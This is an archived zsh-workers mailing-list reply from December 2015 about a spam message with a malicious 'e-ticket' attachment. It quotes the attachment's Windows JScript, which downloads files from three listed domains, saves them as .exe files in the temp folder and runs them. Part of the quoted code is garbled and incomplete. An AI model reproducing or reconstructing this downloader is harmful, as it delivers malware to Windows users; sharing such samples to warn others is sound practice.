From mboxrd@z Thu Jan  1 00:00:00 1970
Return-Path: <zsh-workers-return-37269-mason-zsh=primenet.com.au@zsh.org>
Received: (qmail 6211 invoked by alias); 1 Dec 2015 13:20:15 -0000
Mailing-List: contact zsh-workers-help@zsh.org; run by ezmlm
Precedence: bulk
X-No-Archive: yes
List-Id: Zsh Workers List <zsh-workers.zsh.org>
List-Post: <mailto:zsh-workers@zsh.org>
List-Help: <mailto:zsh-workers-help@zsh.org>
X-Seq: 37269
Received: (qmail 22623 invoked from network); 1 Dec 2015 13:20:12 -0000
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on f.primenet.com.au
X-Spam-Level: 
X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00,T_DKIM_INVALID
	autolearn=ham autolearn_force=no version=3.4.0
DKIM-Signature: v=1; a=rsa-sha256; c=simple; d=mail.ud10.udmedia.de; h=
	date:from:to:cc:subject:message-id:references:mime-version
	:content-type:in-reply-to; s=beta; bh=Ah1W/zOKZnvhL8mkWLqftwlaT0
	ZZTti7zGU8be/N0HM=; b=F+2p3PI34bzBI6fVCrHIcC76fnxmYtTk3DKE235aq/
	fijikeYQfMoAU/T8eWboGlGZBuZOv43liI6gF3R4MEgf/A0hlsIKBXRocxNMQx7t
	0S0wecybWE6BcR4q6KiU2zncqdML3vtn5jqiI4PTj1uiZt4ifL6uFUJ4ZCB+0J12
	Y=
Date: Tue, 1 Dec 2015 14:13:27 +0100
From: Markus Trippelsdorf <markus@trippelsdorf.de>
To: Peter Stephenson <p.stephenson@samsung.com>
Cc: Zsh Hackers' List <zsh-workers@zsh.org>
Subject: Re: zsh-workers/37266 has a malicious attachment
Message-ID: <20151201131327.GB315@x4>
References: <20151201122412.7d355172@pwslap01u.europe.root.pri>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20151201122412.7d355172@pwslap01u.europe.root.pri>

On 2015.12.01 at 12:24 +0000, Peter Stephenson wrote:
> ...probably obvious enough to everyone here, but as it got flagged up by
> our email system I thought it was worth reporting more widely.
> Subject line is "Your e-ticket #0000228935".

Only Windows users are attacked. Here is the code:

var b = "itechgalaxyapps.com mybeautypedia.com kindernestmumbai.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "750083";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i 1000) {
        dn = 1;
        xa.position = 0;
        xa.saveToFile(fn + n + ".exe", 2);
        try {
            ws.Run(fn + n + ".exe", 1, 0);
        } catch (er) {};
    };
    xa.close();
};
if (dn == 1) {
    ld = i;
    break;
};
} catch (er) {};
};
};

-- 
Markus